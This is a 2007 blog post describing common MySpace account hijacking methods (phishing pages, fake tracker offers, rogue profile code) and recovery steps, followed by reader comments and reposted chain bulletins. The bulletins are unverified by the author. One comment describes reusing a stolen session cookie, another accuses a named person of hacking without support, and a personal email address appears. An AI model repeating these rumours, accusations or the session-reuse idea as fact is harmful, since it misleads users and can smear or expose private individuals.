How your Myspace got hacked
Since I’m notifying people whose Myspace profiles got “hacked”, I figured I should put up a more comprehensive post on how it might have happened, and what to do about it.
To recap: Lately a lot of spam has been posted as comments on profiles, and the person who seemingly posted the comment, has no idea it’s happening. The typical spam lately has been: iPhone, Macy’s gift card, Victoria’s secret gift card, Nintendo Wii, penis pills, ringtones, some kind of dating site, porn (one user unwittingly sent out porn bulletins). In the past we’ve seen bulletins sent out by unsuspecting people - and they were hawking Luis Vuitton bags, and webcam girls.
First of all, most of the time, your profile got hacked because you gave away your password to the bad guys. And there are a few ways it normally happens. See below. First for what you need to do to fix it:
You need to change your password. But that’s not always enough. And here’s why:
Even when you change your password, the bad guys keep sending out stuff in your name.
The reason could be that they placed rogue code inside your profile. Here’s an actual example of that:
http://spamhuntress.com/2007/03/23/anatomy-of-a-hacked-myspace-page/
In other words - you need to clear out code they left behind in your profile (often in the About me section), that gives them your new password each time you change, because they got you to “sign in again” - at a fake place. Then change the password again, taking care not to sign in again on a fake site.
Here’s how they got your password in the first place:
1)
Did you click on a link bearing a resemblance to this, and then go through the process?
Well, this guy at one time had a tracker he gave out, but these days the only thing he seems interested in is getting the password to your profile so he can send out his spam. And lots of people do give him their passwords, thinking they’ll get that tracker.
There is no software involved that I know of, so changing your password might be enough. Check your profile to see if there’s any strange code on it, or something got deleted.
2)
Then there’s this thing:
It’s a program, and it downloads automatically once you click on the link under that image. Apparently, it throws up some popups during or after installation that asks for your password. Vitalsecurity tried it (see here and here), and said it didn’t appear to work, but it does spam in your name.
This is software that resides on your local machine. I don’t know if changing your password is enough. We’ll need some feedback from someone who tested it to be sure. But change your password and see if that fixes it. And check your profile for any code added or removed by the bad guys.
3)
The third way is if you receive an e-mail that tricks you into logging into Myspace - only there’s a link in that e-mail going to a fake myspace site.
With this way, changing your password and checking your profile for rogue code should be enough.
4)
Links from bulletins and comments, leading to a fake myspace site. They copy the myspace site, with a lookalike site name. The fake site says you’ve been logged out and need to log in again.
You need to change your password, and check your profile for rogue code.
5)
Well, I don’t know if there is a fourth way. There probably is. But I’ll have to ask from help from the readers on this one. How about that tracking code that supposedly reads the cookies from Myspace if you’re logged in?
Conclusion:The people behind the two first methods do spam in your name - to get more people to give away their passwords. But I don’t know yet who’s responsible for the spam that’s not for the “scam”. If you know exactly how your password got pilfered, and you can show what kind of spam got posted through your profile, please let me know.
March 19th, 2007 at 4:30 pm
This was posted as a bulletin on Myspace, unknown writer:
how to safetly delete the tracker in the comments virus
how to safely delete comments with “profile tracker” ads: these comments/ads are put on your profile by hackers! they infiltrate profiles of your friends and post the ads in comments on your profile. these comments have embedded codes that hide the ‘delete’ feature, and replace it with a gray ‘delete’ box. {or other versions}..but do not click on that box, because it’s a trick to get into your profile!
to remove the comment, go into your homepage, click on ‘edit profile’. then look on the upper right hand page and find…”safe edit mode”! once in that mode, click on “comments”. then you will see the comments in html format, and you can safely delete, as the feature is visible. advice: delete all comments with “profile tracker” ads…good luck!
also, if someone has posted a comment using your profile (a hacker), change your password and email!
please repost this bulletin for all your friends to see!!!
March 19th, 2007 at 4:45 pm
I’m answering my own comment here:
I don’t see any code that shouldn’t be there in those comments. I also haven’t received any of those comments before, so it’s hard to say what happens once you’ve got one. Can anyone confirm or debunk what was in that bulletin?
March 22nd, 2007 at 10:35 am
I just got another bulletin. The content is unconfirmed, and I don’t know who wrote it.
Subject: Got Hacked? -Thanks…They Call Us Devil Dogs
Have you noticed weird bulletins posted by your friends lately? Instead of surveys and games, it looks like they’re advertising ringtones for songs they don’t even like, or telling you to smoke pot when they’re not even a pot smoker?
If so, it probably means their MySpace profile has been stolen, and yours could be next.
Profile thieves are stealing MySpace profiles left and right so they can spam other people, and in some cases, they manage to steal more than just your MySpace.
Here’s how they usually steal it:
They post a message, bulletin, or comment containing a Flash file. It might be disguised as a game, or lately there’s one that says, “Click here if you like to smoke pot.” But in reality, it’s just a trap to steal your MySpace.
Without you realizing it, the Flash file automatically redirects you to a different website where the thief has set up a copycat of the MySpace login page. What it looks like to you is, “Oh, stupid MySpace logged me out again.” And so you enter your username and password, and bingo — they just stole your profile. Since you were on a copycat site, it didn’t log you in. It just stored the email and password you entered in a big file, and now that profile thief is going to use your account to spam people.
But the danger doesn’t end there. The person who stole your profile knows that you can always change your password and lock them out of your account. So now, they try to take over your profile entirely. If they see your email address ends in yahoo.com or hotmail.com, they go to your email login page and try to log in to your email account with the same password. Many people use the same password for their email account and their MySpace profile, and if you’re one of those people, now the thief has access to your email, too.
And check this out — once they have access to your email, they can start sending lost password requests to PayPal, AIM, Yahoo Messenger, eBay, or anywhere else you might have an account, and they can now reset your passwords on other systems, and even change the email address on your MySpace profile to their own address so you can never log in again!
Don’t be fooled into thinking that MySpace will let you back in to your profile once it gets stolen and you can no longer log in.
If this happens, MySpace will ask you to send a digital picture of yourself so they can see if you are pictured in the account that you say was stolen. If the spammer has deleted all of the face pics in your profile (which they usually do), then MySpace won’t do anything at all because you have no way to prove the profile is really yours.
But if they see your picture in the account you say was stolen, MySpace still won’t give you access to the account — they’ll just DELETE IT. And now the spammer can’t use it anymore, but you will have lost all of your messages, photos, and comments and you’ll have to start all over again.
Here’s how you can protect yourself from profile thieves:
1. Change your MySpace password right now. Even if you haven’t seen weird bulletins yet, your account info may have been stolen already and the thief just hasn’t used it yet. They steal thousands of profiles at a time, and yours could be sitting in some spammer’s list just waiting to be hijacked.
2. Change the password to your email address right now. It’s no good just changing your MySpace password, because if they can get into your email account, they can still steal your profile.
3. IMPORTANT: Make sure your new email password and your new MySpace password aren’t the same!
4. Never click on a link in a bulletin, message, or comment that looks suspicious. It’s probably a trap to steal your profile.
5. If it EVER looks like MySpace has logged you out, don’t enter your email and password. Instead, type ‘www.myspace.com’ in the address bar and hit enter to make sure you are still on the real MySpace website and not a copycat site.
6. If you see weird bulletins showing up from your friends, message them right away to tell them their profile has been stolen and advise them to change BOTH their MySpace password and their email account’s password. Most people don’t see the bulletins their account is posting until it’s too late.
7. COPY AND PASTE this whole message into a new bulletin.
Let’s keep profile thieves from stealing our profiles and our friends’ profiles!
March 23rd, 2007 at 5:51 am
Here’s another found in a bulletin today:
Subject: BEWARE OF HACKERS! (thanks unique jewellery)
Have you noticed weird bulletins posted by your friends lately? Instead of surveys and games, it looks like they’re advertising ringtones for songs they don’t even like, or telling you to smoke pot when they’re not even a pot smoker? Or even bulletins that end in numbers for example like “F**k this Bitch!! 25489″
If so, it probably means their MySpace profile has been stolen, and yours could be next.
Profile thieves are stealing MySpace profiles left and right so they can spam other people, and in some cases, they manage to steal more than just your MySpace.
Here’s how they usually steal it:
They post a message, bulletin, or comment containing a Flash file. It might be disguised as a game, or lately there’s one that says, “Click here if you like to smoke pot.” But in reality, it’s just a trap to steal your MySpace.
Without you realizing it, the Flash file automatically redirects you to a different website where the thief has set up a copycat of the MySpace login page. What it looks like to you is, “Oh, stupid MySpace logged me out again.” And so you enter your username and password, and bingo — they just stole your profile. Since you were on a copycat site, it didn’t log you in. It just stored the email and password you entered in a big file, and now that profile thief is going to use your account to spam people.
But the danger doesn’t end there. The person who stole your profile knows that you can always change your password and lock them out of your account. So now, they try to take over your profile entirely. If they see your email address ends in yahoo.com or hotmail.com, they go to your email login page and try to log in to your email account with the same password. Many people use the same password for their email account and their MySpace profile, and if you’re one of those people, now the thief has access to your email, too.
And check this out — once they have access to your email, they can start sending lost password requests to PayPal, AIM, Yahoo Messenger, eBay, or anywhere else you might have an account, and they can now reset your passwords on other systems, and even change the email address on your MySpace profile to their own address so you can never log in again!
**Don’t be fooled into thinking that MySpace will let you back in to your profile once it gets stolen and you can no longer log in.**
If this happens, MySpace will ask you to send a digital picture of yourself so they can see if you are pictured in the account that you say was stolen. If the spammer has deleted all of the face pics in your profile (which they usually do), then MySpace won’t do anything at all because you have no way to prove the profile is really yours.
But if they see your picture in the account you say was stolen, MySpace still won’t give you access to the account — they’ll just DELETE IT. And now the spammer can’t use it anymore, but you will have lost all of your messages, photos, and comments and you’ll have to start all over again.
Here’s how you can protect yourself from profile thieves:
1. Change your MySpace password right now. Even if you haven’t seen weird bulletins yet, your account info may have been stolen already and the thief just hasn’t used it yet. They steal thousands of profiles at a time, and yours could be sitting in some spammer’s list just waiting to be hijacked.
2. Change the password to your email address right now. It’s no good just changing your MySpace password, because if they can get into your email account, they can still steal your profile.
3. IMPORTANT: Make sure your new email password and your new MySpace password aren’t the same!
4. Never click on a link in a bulletin, message, or comment that looks suspicious. It’s probably a trap to steal your profile.
5. If it EVER looks like MySpace has logged you out, don’t enter your email and password. Instead, type ‘www.myspace.com’ in the address bar and hit enter to make sure you are still on the real MySpace website and not a copycat site.
6. If you see weird bulletins showing up from your friends, message them right away to tell them their profile has been stolen and advise them to change BOTH their MySpace password and their email account’s password. Most people don’t see the bulletins their account is posting until it’s too late.
7. COPY AND PASTE this whole message into a new bulletin and let’s keep profile thieves from stealing profiles!
*********** PLEASE REPOST FOR YOUR friends
April 11th, 2007 at 7:44 pm
hey,
my name is chelsea and i just wanted to tell you i have been following this advice and i have never once been phished or hacked.
thank you very much and keep up the wonderful work!
:)
chelsea
April 12th, 2007 at 9:52 am
Watch out for a fat git called Bernard o mahoney. He is constantly hacking into my computer and reading my personal stuff. Oh yeah, and he’s a grass.
April 12th, 2007 at 4:09 pm
Umm Andy?
You sure you haven’t dipped into the grass supply?
April 13th, 2007 at 10:41 am
it has happening a lot lately - please tell your editor to contact me on my email address provided
April 13th, 2007 at 9:21 pm
Searching $500 gift card myspace on google gives you like 1.5 million profiles.
Some of my friends have this problem. This site really needs to get linked to everywhere throughout myspace
April 19th, 2007 at 2:54 am
I have suddenly been unable to log back into my accout on Myspace. The problem is that I changed my password and foolishly did not write it down. I keep trying to go through the password request data to have it sent to my email address. When I submit my address it says that my password was sent to my email address. Well it never shows up in my email. I am wondering if anyone has any suggestions, or knows what could be wrong. Thanks
April 19th, 2007 at 2:56 am
By the way, I have already checked my email account and there are no restrictions as to what I can receive so it is not bouncing the password email away, not auto-filing into a junk folder.
April 20th, 2007 at 9:06 pm
I am glad I read this today. I was hacked earlier and knew what to look for beacause I was here earlier this afternnon. The hackers did not have a chance to post anything yet! Thank god. Is there anything we can do like start a class action suit? If so, it would be best to pursue the sites they are refering. There is no way that they are not encouraging this type of behavior. Please contact me by email if you know anything. Thank you.
April 27th, 2007 at 11:28 am
FOR SOME REASON IM GETTING RESPONCE FROM NIGERIAN SCAMMERS AND I WOULD LIKE IT TO STOP.
June 20th, 2007 at 1:59 am
um hi i am not happy because someone hacked into my myspace. cane you plz help me plz get back my myspace
June 26th, 2007 at 7:14 am
My myspace must have been hacked because I can’t log in, and when I used the password retrieval it says that my e-mail is not registered with them. I am very upset about this, but apparently there is nothing that I can do except have myspace shut down my current page.
July 2nd, 2007 at 11:22 pm
I have been phished and i dont know how to fix it someone help. I can login but it tells me at the top that i have been phished but myspace caught it and all i have to do is change my password. so i click on the change password and it wont show the verification code i need to type in. please help
July 3rd, 2007 at 5:48 am
I was phished and fell for the trick, I ge ton myspace, and I get a message stating I was phished, it asked me to enter my e-mail and password then enter a new one…it wouldn’t work the first 8 hours or so, went to sleep woke up up , tried it again, it let me do it this time, but I notice in my myspace url part of it says “fuseaction=user&MyToken”..that can’t be a good thing…I log out…go back into www.myspace.com ….once Ilog in, my url states the same thing….help please
July 5th, 2007 at 11:24 am
I appreciate the advice and all, but what if you are unable to log into your myspace at all because your profile has been stolen? I cannot log in at all, and I KNOW I have the correct Username and Password. I need help! How do I get in to delete my profile completely? I don’t like my page and all my info to be out there and then not being able to access it. HELP HELP Please…
l_megar@yahoo.com
L
July 12th, 2007 at 8:06 am
hey.. thanks for the info.. but there not even any info about how to get our own myspaces back from those hackers. they’d stole our myspace and we can’t even LOG IN! I wonder how do e change our pw without us in our page? o_o
July 19th, 2007 at 6:50 pm
Alright, even if you do change your password repeatedly, and all that crap, it might be useless anyway, if the hackers/phishers are smart.
MySpace uses a cookie, called “MYUSERINFO”, which basically identifies you as the user. If they got in, and copied that cookie’s information, they can get in any time they want. That code never changes. They don’t even need to know your username and password after they get that cookie information. All they need to do is log in once, and they’ve got your profile for life.
Just goes to show how idiotic Tom is. Storing that sensitive data in a cookie, fsking retard.
August 8th, 2007 at 2:15 pm
thats for the info… but i have bigger problems… i was trying to log in the day after i changed my password and forgot it. so when i clicked i had forgot my password they sent the wrong one. So now i can get on at all
September 10th, 2007 at 1:28 pm
Jake, myspace cookies become useless once the browser is closed (session ends) if what you are saying was true, you wouldn’t need your own password now would you?
October 6th, 2007 at 11:10 pm
Ive notice recently that im getting lots of and me as a friend …there’s about 2 pages worth of this..it only happens after I send a message to somebody thats not on my friends list. my question is, This type of thing common? or is it some sort of hack/spam adding thing..cause it seems a bunch of people try to add me but i also notice non existing accounts try to add me as well is this something i should be concerned about please help.
October 14th, 2007 at 11:29 pm
i have a myspace page and i keep getting spammed by this girl every day who keeps changing her name with her multiple profiles and is harassing me with multiple friend requests MAKE IT STOP!
October 20th, 2007 at 5:17 am
HELP ME I HAVE CHANGED AND CHANGED MY PASSWORD AND THEY STILL GET ON. I DONT KNOW HOW I ALWAYS DELETED MY MESSAGES. COULD IT BE FROM ( REMEBER MY PASSWORD, DONT REMEMBER IT) PLZ HELP ME I HAVE TRIED EVERYTHING dont send anything to me she wil read it
October 22nd, 2007 at 5:38 pm
I got hacked and ‘I’ was sending this link being like “I can’t believe we went to school with this chick” and then posted a link. But the link said it was fake and it was just someone wanting my password, thankfully, but anyways, I was a retard and used my moms email on myspace and I don’t think she usually gets emails from myspace because she never said anything, but I just want to cancel my account now because I barely used it, and it said it sent an email to my mom’s account and I know her password so I went on her account but it hasn’t been sent yet and it’s not in her junk folder. Is it just being slow or did the hackers like, change my email? Cause I tried to change my email to my acual email but it said it was sending an email to my mom’s account first. Guh.
November 26th, 2007 at 7:04 pm
my myspace got hacked and the computer blew up.
what should i do?
November 27th, 2007 at 6:15 am
To nal_rA:
Maybe you should try that comment somewhere people don’t actually know anything about computers and might believe you?
December 14th, 2007 at 4:55 am
Hello, a friend of mine, her profile has gotten hacked. I’ve tried to help her in telling her to change her password and viewing her profile in safe mode to see if there are any hidden codes. Her myspace page was hacked a while back and she had the bulletins being posted and advertising the Macy’s card and such. She changed her password, and deleted all information in her about me section and profile she says, and she isn’t able to send messages at all or comments and her profile says she has been deleted but it still let’s her login. She can only post bulletins
December 14th, 2007 at 5:58 am
Hi N.’s
The reason she can’t send messages or comments is precisely because her comment was hacked. It’s been blocked from sending stuff by Myspace. Contact Myspace for her and tell them that she’s done all she can to reclaim the profile, and could they please unblock it.
December 23rd, 2007 at 12:15 am
I WAS HACKED ON MYSPACE AND MY ACCOUNT IS STILL THERE AND I CANT GET IT BACK FROM MYSPACE AND WHOEVER HACKED ME CHANGE MY E-MAIL IS THERE ANY WAY ICOULD GET IT BACK
December 26th, 2007 at 10:46 pm
my myspace was phished and when i click the link that says change password and secure your acconunt, it just signs me out, do you know a way around that? Pleas and thanx
February 1st, 2008 at 7:15 pm
hey everytime i try to log into myspace it just keeps saying that “you must be logged in to do that” and just keeps refreshing the page with “you must be logged in to do that”
please help
thankyou
February 25th, 2008 at 1:10 pm
thanks i really need that i have been hack so many time and when someone request u and it says accept and deny and spam what do they mean by spam i need help plz thanks
DESi